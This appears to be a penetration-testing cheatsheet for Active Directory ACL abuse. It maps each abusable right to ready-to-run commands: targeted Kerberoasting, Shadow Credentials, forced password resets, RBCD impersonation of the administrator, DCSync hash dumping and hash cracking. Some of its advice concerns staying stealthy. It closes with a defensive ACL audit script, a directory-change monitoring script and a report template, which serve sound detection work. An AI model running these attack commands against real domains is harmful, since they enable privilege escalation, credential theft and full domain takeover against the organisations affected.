πŸ›‘οΈ Methodology Checklist

  • Collect BloodHound data first - never abuse ACLs blind
  • Identify the right: GenericAll, GenericWrite, WriteOwner, WriteDACL, ForceChangePassword, AddMember/AddSelf, WriteSPN, AddKeyCredentialLink, Read[LAPS|GMSA]Password, DCSync
  • Pick the abuse primitive matching the target object type (User vs Group vs OU vs Domain)
  • Prefer Shadow Credentials / targetedKerberoast over password resets when stealth matters (resets are noisy and lock out the legitimate user)
  • Confirm DC reachability and clock skew before any Kerberos-based abuse
  • Clean up: drop added group memberships, revert SPNs, remove KeyCredentialLinks

🎯 Operational Context

Use when: BloodHound (or manual ACL enumeration) shows the controlled principal has an actionable right over a target object and you need the exact command to abuse it.
Think Dumber First: The right tells you what’s possible; the object type tells you which tool to reach for. Match right + target type → command. Don’t reset a password if targetedKerberoast or Shadow Credentials will do.
Skip when: No path in BloodHound - go enumerate first (Master_AD_Commands).


⚡ Tactical Cheatsheet

GenericWrite on User

Update object’s attributes - most commonly abused via Targeted Kerberoasting or Shadow Credentials.

Targeted Kerberoasting

| Command | Tactical Outcome |
|---|---|
| `targetedKerberoast.py -d [DOMAIN] --dc-ip [DC_IP] -u [USER] -p [PASS] --dc-host [DC] --request-user [TARGET_USER]` | Write SPN → request TGS → revert SPN |
| `hashcat -m 13100 -a 0 [HASH_FILE] rockyou.txt --force` | Crack TGS hash |
| `john [HASH_FILE] --wordlist=rockyou.txt` | Crack TGS hash (John) |

Shadow Credentials

| Command | Tactical Outcome |
|---|---|
| `certipy shadow auto -u [USER]@[DOMAIN] -p [PASS] -account [TARGET_USER] -dc-ip [DC_IP]` | Add KeyCredentialLink → PKINIT → NT hash |
| `certipy shadow auto -username [USER]@[DOMAIN] -k -account [TARGET_USER] -dc-ip [DC_IP]` | Same via Kerberos auth |

GenericALL on User

Full rights to the object - change password or add to a group.

Change Password

| Command | Tactical Outcome |
|---|---|
| `bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set password [TARGET_USER] [NEW_PASS]` | Reset target user password |
| `net rpc password '[TARGET_USER]' '[NEW_PASS]' -U '[DOMAIN]'/'[USER]'%'[NTLM_HASH]' -S '[DC]' --pw-nt-hash` | Reset via RPC (pass-the-hash) |
| `net rpc password '[TARGET_USER]' '[NEW_PASS]' -U '[DOMAIN]'/'[USER]'%'[PASS]' -S '[DC]'` | Reset via RPC (password) |

Add User to a Group

| Command | Tactical Outcome |
|---|---|
| `net rpc group addmem [TARGET_GROUP] [NEW_MEMBER] -U [DOMAIN]/[USER] -S [DC]` | Add member via RPC |
| `bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add groupMember [TARGET_GROUP] [NEW_MEMBER]` | Add member via bloodyAD |

RBCD (Resource-Based Constrained Delegation)

| Command | Tactical Outcome |
|---|---|
| `rbcd.py -delegate-from [MACHINE] -delegate-to [TARGET] -dc-ip [DC_IP] -action write '[DOMAIN]/[USER]:[PASS]'` | Write msDS-AllowedToActOnBehalfOfOtherIdentity |
| `getST.py -spn 'cifs/[DC]' -impersonate administrator -dc-ip [DC_IP] '[DOMAIN]/[MACHINE]:[PASS]'` | S4U2Self+S4U2Proxy → impersonate DA |
| `export KRB5CCNAME=administrator.ccache` | Load impersonated ticket |

GenericALL on OU

| Command | Tactical Outcome |
|---|---|
| `dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal [USER] -target-dn '[OU_DN]' [DOMAIN]/[USER]:[PASS]` | Grant inherited FullControl over OU contents |

ForceChangePassword

Ability to change a user’s password without knowing the old one.

| Command | Tactical Outcome |
|---|---|
| `net rpc password [TARGET_USER] [NEW_PASS] -U "[DOMAIN]"/"[USER]"%"[PASS]" -S [DC]` | Reset via RPC |
| `bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set password [TARGET_USER] [NEW_PASS]` | Reset via bloodyAD |
| `python rpcchangepwd.py [DOMAIN]/[USER]:[PASS]@[DC_IP] -newpass [NEW_PASS]` | Reset via rpcchangepwd |
| `nxc smb [DC] -u [USER] -p [PASS] -M change-password -o USER='[TARGET_USER]' NEWPASS='[NEW_PASS]'` | Reset via NetExec module |

AddMember

Ability to modify group membership.

| Command | Tactical Outcome |
|---|---|
| `net rpc group addmem [TARGET_GROUP] [NEW_MEMBER] -U [DOMAIN]/[USER] -S [DC]` | Add member via RPC |
| `bloodyAD.py --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add groupMember [TARGET_GROUP] [NEW_MEMBER]` | Add member via bloodyAD |

AddSelf

The user has the ability to add itself to the target group.

| Command | Tactical Outcome |
|---|---|
| `bloodyAD.py --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add groupMember [TARGET_GROUP] [USER]` | Add self to group |

WriteOwner

Change object owner to attacker-controlled user → take over the object.

| Command | Tactical Outcome |
|---|---|
| `owneredit.py -action write -new-owner [USER] -target [TARGET] [DOMAIN]/[USER]:[PASS]` | Change object owner |
| `dacledit.py -action 'write' -rights 'FullControl' -principal [USER] -target-dn [DN] '[DOMAIN]/[USER]:[PASS]'` | Grant self FullControl |
| `dacledit.py -action 'write' -rights 'WriteMembers' -principal [USER] -target-dn [DN] '[DOMAIN]/[USER]:[PASS]'` | Grant self WriteMembers (group-only takeover) |
| `bloodyAD.py --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add groupMember [TARGET_GROUP] [USER]` | Add self after ownership change |

WriteSPN

Ability to write the servicePrincipalName attribute on the target user → Kerberoast.

| Command | Tactical Outcome |
|---|---|
| `bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set object [TARGET] servicePrincipalName -v 'fake/spn'` | Write fake SPN |
| `GetUserSPNs.py [DOMAIN]/[USER]:[PASS] -dc-ip [DC_IP] -request` | Request TGS for the planted SPN |
| `targetedKerberoast.py -d [DOMAIN] --dc-ip [DC_IP] -u [USER] -p [PASS] --dc-host [DC] --request-user [TARGET_USER]` | One-shot: write SPN, request, revert |

AddKeyCredentialLink

Plant a certificate in msDS-KeyCredentialLink → PKINIT → NT hash (Shadow Credentials).

| Command | Tactical Outcome |
|---|---|
| `pywhisker.py -d [DOMAIN] --dc-ip [DC_IP] -u [USER] -p [PASS] --target [TARGET] --action add` | Add KeyCredentialLink + write PFX |
| `gettgtpkinit.py -cert-pfx [PFX_FILE] -pfx-pass [PFX_PASS] [DOMAIN]/[TARGET] ticket.ccache -dc-ip [DC_IP]` | PKINIT → TGT |
| `getnthash.py [DOMAIN]/[TARGET] -k [KEY] -dc-ip [DC_IP]` | Extract NT hash from TGT |
| `certipy shadow auto -u [USER]@[DOMAIN] -p [PASS] -account [TARGET_USER] -dc-ip [DC_IP]` | One-shot equivalent via Certipy |

ReadLAPSPassword

| Command | Tactical Outcome |
|---|---|
| `nxc smb [TARGET] -u [USER] -p [PASS] --laps` | Read LAPS-managed local admin passwords |

ReadGMSAPassword

| Command | Tactical Outcome |
|---|---|
| `nxc ldap [TARGET] -u [USER] -p [PASS] --gmsa` | Read gMSA managed password blob → NT hash |

DCSync

Principal has DS-Replication-Get-Changes + DS-Replication-Get-Changes-All on the domain object.

| Command | Tactical Outcome |
|---|---|
| `secretsdump.py [DOMAIN]/[USER]:[PASS]@[DC]` | DCSync (password) |
| `secretsdump.py [DOMAIN]/[USER]@[DC] -hashes :[NTLM_HASH]` | DCSync (pass-the-hash) |
| `secretsdump.py [DC] -k` | DCSync (Kerberos ticket) |
| `nxc smb [TARGET] -u [USER] -p [PASS] --ntds` | DCSync via NetExec |
| `nxc smb [TARGET] --use-kcache --ntds` | DCSync via NetExec using cached ticket |

🔬 Deep Dive & Workflow

ACL Abuse Decision Matrix

| Right | Target | Exploitation |
|---|---|---|
| ForceChangePassword | User | Reset password without knowing the current one |
| GenericWrite | User | Assign fake SPN → targeted Kerberoast |
| GenericWrite | Group | Add users to the group |
| GenericAll | User/Computer | Full control - Kerberoast, reset password, or LAPS read |
| AddSelf / AddMembers | Group | Add yourself / any user to the group |
| WriteDACL | Object | Write new ACEs - grant yourself DCSync rights |
| ReadGMSAPassword | gMSA | Extract Group Managed Service Account password |
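The defender-side check for the rights in this matrix, as an added example that is not code from the original page: it walks the Tier 0 objects named in the Reporting Trigger (domain head, Domain Controllers OU, AdminSDHolder, krbtgt, adminCount=1 groups) and reports every Allow ACE held by a principal outside an assumed "expected" list that carries one of the abusable rights. It assumes the ActiveDirectory PowerShell module on a domain-joined host; the `$expected` list is an assumption to tune per forest.

```powershell
# Added example, not code from the original page: list non-default ACEs on Tier 0
# objects that grant any right from the decision matrix above.
Import-Module ActiveDirectory
$rootDse = Get-ADRootDSE
$domain  = Get-ADDomain
$nb      = $domain.NetBIOSName

# Resolve schema attribute and extended-right GUIDs to names, so an ACE scoped to
# e.g. msDS-KeyCredentialLink or the two DS-Replication-Get-Changes rights is readable
$guidMap = @{}
$guidMap[[guid]::Empty] = 'All'
Get-ADObject -SearchBase $rootDse.schemaNamingContext -LDAPFilter '(schemaIDGUID=*)' `
    -Properties lDAPDisplayName, schemaIDGUID |
    ForEach-Object { $guidMap[[guid]$_.schemaIDGUID] = $_.lDAPDisplayName }
Get-ADObject -SearchBase "CN=Extended-Rights,$($rootDse.configurationNamingContext)" `
    -LDAPFilter '(objectClass=controlAccessRight)' -Properties displayName, rightsGUID |
    ForEach-Object { $guidMap[[guid]$_.rightsGUID] = $_.displayName }

# Tier 0 set: domain head, DC OU, AdminSDHolder, krbtgt, and every adminCount=1 group
$tier0 = @(
    $domain.DistinguishedName
    "OU=Domain Controllers,$($domain.DistinguishedName)"
    "CN=AdminSDHolder,CN=System,$($domain.DistinguishedName)"
    (Get-ADUser krbtgt).DistinguishedName
) + (Get-ADGroup -LDAPFilter '(adminCount=1)' | Select-Object -ExpandProperty DistinguishedName)

# Assumed list of principals that legitimately hold these rights; tune for your forest
$expected = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
    "$nb\Domain Admins", "$nb\Enterprise Admins", "$nb\Domain Controllers")
$rights = 'GenericAll','GenericWrite','WriteOwner','WriteDacl','ExtendedRight','WriteProperty','Self'

foreach ($dn in $tier0) {
    $acl = Get-Acl -Path "AD:\$dn"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($expected -contains $ace.IdentityReference.Value) { continue }
        # ActiveDirectoryRights stringifies as "WriteProperty, ExtendedRight" etc.
        $hit = ($ace.ActiveDirectoryRights.ToString() -split ',\s*') | Where-Object { $_ -in $rights }
        if (-not $hit) { continue }
        $objType = if ($guidMap.ContainsKey($ace.ObjectType)) { $guidMap[$ace.ObjectType] } else { $ace.ObjectType }
        [pscustomobject]@{
            Object     = $dn
            Principal  = $ace.IdentityReference.Value
            Rights     = $hit -join ','
            ObjectType = $objType   # 'All' = not scoped to a single attribute or right
            Inherited  = $ace.IsInherited
        }
    }
}
```

Rows with ObjectType `All` and GenericAll/WriteDacl/WriteOwner, or ExtendedRight scoped to DS-Replication-Get-Changes(-All), are the ones that map directly onto the matrix above; WriteProperty rows need the ObjectType column to decide whether the attribute is abusable.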

πŸ› οΈ Troubleshooting & Edge Cases

| Problem | Cause | Fix |
|---|---|---|
| KRB_AP_ERR_SKEW on Kerberos abuse | Clock drift > 5 min from DC | `sudo ntpdate [DC]` or `sudo rdate -n [DC]` |
| STATUS_ACCESS_DENIED on dacledit/owneredit | Stale BloodHound data - right was revoked | Re-collect BloodHound; check ACE inheritance and explicit DENY |
| targetedKerberoast returns no hash | SPN write rolled back before TGS request | Run with verbose flag; verify SPN landed via `Get-DomainUser -Identity [TARGET_USER]` |
| Shadow Credentials fails with KDC_ERR_CLIENT_NOT_TRUSTED | DC has no NTAuth cert / PKINIT not configured | Fall back to password reset or targeted Kerberoast |
| bloodyAD LDAP bind fails over plaintext | DC enforces LDAP signing/channel binding | Use `--ldaps` or Kerberos auth (`-k`) |
| Password reset visibly breaks the account | Helpdesk ticket incoming | Prefer Shadow Credentials / targeted Kerberoast; reset only as last resort and on stale/service accounts |

πŸ“ Reporting Trigger

Finding Title: Excessive Active Directory ACL Permissions Enable Domain Privilege Escalation Impact: Misconfigured ACEs (GenericAll / GenericWrite / WriteOwner / WriteDACL / ForceChangePassword / DCSync) on high-value AD objects allow lower-privileged principals to take over users, groups, OUs, and ultimately the domain via well-documented abuse primitives (Shadow Credentials, targeted Kerberoasting, RBCD, DCSync). Root Cause: Delegated permissions granted without least-privilege review; legacy admin groups carrying inherited rights; service accounts owning user objects they should not. Recommendation: Audit ACLs on Tier 0 objects (Domain, Domain Controllers OU, AdminSDHolder, krbtgt, privileged groups). Remove non-essential ACEs. Protect privileged users with Protected Users group + sensitive-and-cannot-be-delegated flag. Monitor for KeyCredentialLink writes and SPN modifications.
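The monitoring half of the Recommendation, as an added example that is not code from the original page: it pulls Directory Service Changes events (ID 5136) from a DC for the attributes each abuse primitive on this page has to write. It assumes the "Audit Directory Service Changes" subcategory is enabled and the watched objects carry a Write Property SACL entry (without both, 5136 is never logged); `DC01` is an assumed placeholder DC name and the Security log needs an admin reader.

```powershell
# Added example, not code from the original page: surface 5136 events for the
# attribute writes behind Shadow Credentials, targeted Kerberoast, RBCD,
# AddMember/AddSelf and WriteDACL/WriteOwner abuse.
param([string]$DcName = 'DC01', [int]$Hours = 24)   # DC01 is an assumed placeholder

# Each attribute maps to a primitive on this page:
#   msDS-KeyCredentialLink                   -> Shadow Credentials / AddKeyCredentialLink
#   servicePrincipalName                     -> targeted Kerberoast / WriteSPN
#   msDS-AllowedToActOnBehalfOfOtherIdentity -> RBCD
#   member                                   -> AddMember / AddSelf
#   nTSecurityDescriptor                     -> WriteDACL / WriteOwner
$watched = 'msDS-KeyCredentialLink', 'servicePrincipalName',
           'msDS-AllowedToActOnBehalfOfOtherIdentity', 'member', 'nTSecurityDescriptor'

# Build the XPath: EventID 5136 inside the time window, attribute in the watch list
$attrClause = ($watched | ForEach-Object { "Data[@Name='AttributeLDAPDisplayName']='$_'" }) -join ' or '
$window     = $Hours * 3600 * 1000   # timediff() in event XPath is in milliseconds
$xpath      = "*[System[EventID=5136 and TimeCreated[timediff(@SystemTime) <= $window]] and EventData[$attrClause]]"

$events = Get-WinEvent -ComputerName $DcName -LogName Security -FilterXPath $xpath -ErrorAction SilentlyContinue

foreach ($e in $events) {
    # Flatten the EventData <Data Name="..."> nodes into a lookup
    $data = @{}
    foreach ($n in ([xml]$e.ToXml()).Event.EventData.Data) { $data[$n.Name] = $n.'#text' }
    # OperationType is a resource-string id: %%14674 = value added, %%14675 = value deleted
    $op = switch ($data.OperationType) { '%%14674' { 'Added' } '%%14675' { 'Deleted' } default { $_ } }
    [pscustomobject]@{
        Time      = $e.TimeCreated
        Subject   = "$($data.SubjectDomainName)\$($data.SubjectUserName)"
        Object    = $data.ObjectDN
        Attribute = $data.AttributeLDAPDisplayName
        Operation = $op
    }
}
```

An Added followed within seconds by a Deleted on servicePrincipalName for the same object is the write-request-revert sequence the targetedKerberoast rows above describe; a single Added on msDS-KeyCredentialLink by a subject that is not the object itself or a known provisioning account is the Shadow Credentials write.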